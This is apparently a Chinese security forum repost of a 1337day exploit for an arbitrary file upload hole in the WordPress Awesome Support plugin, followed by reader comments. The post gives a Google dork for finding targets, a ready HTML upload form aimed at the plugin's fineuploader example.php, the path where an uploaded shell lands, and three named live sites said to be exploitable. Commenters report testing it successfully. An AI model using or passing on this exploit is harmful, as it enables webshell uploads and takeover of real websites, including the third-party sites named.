WordPress awesome-support插件任意文件上传漏洞
 
                    
                    Code:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0                  I'm DaOne member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: WordPress Awesome Support - Arbitrary File Upload Vulnerability
# Author: DaOne (TGT)
# Vendor Homepage: [url]http://codecanyon.net/item/wp-awesome-support-responsive-ticket-system/4619686[/url]
# Price: $21
# Category: webapps/php
# Google dork: inurl:wp-content/plugins/awesome-support
---------------------------------------------------
# Exploit
<html>
<body>
<form action="http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php" method="post"
enctype="multipart/form-data">
Filename:<input type="file" name="qqfile" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
just select your file and submit
Shell path: http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/uploads/
Demo sites
[url]http://buzness.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php[/url]
[url]http://themespixel.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php[/url]
[url]http://www.comproporvos.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php[/url]
# C168A953370DB22D   1337day.com [2013-10-18]   FBD32007C93EF975 #
 
    
 
评论26次
WordPress 就插件问题多
测试成功,前来报道,不过还是有点鸡肋,插件使用率不高
呵呵,插件!。。。
插插插件~.gif)
感谢分享,收藏~
收藏ing。,谢谢
wp的插件漏洞太多了
一直想组织有心人,整理一xi列的wp插件,以及各个版本的各种漏洞。
不多,一般人不怎么用插件
还真不多
还真很少见
我喜欢,就是用这个插件多吗?
直接传php?这个是个什么插件,常不常用
用这插件的多吗
插件啊插件。。。
感谢分享,收藏~
感谢分享,收藏~
用这个插件的多吗?
被标题骗进来的。。
啊D放的图就是在讲这个啊。。。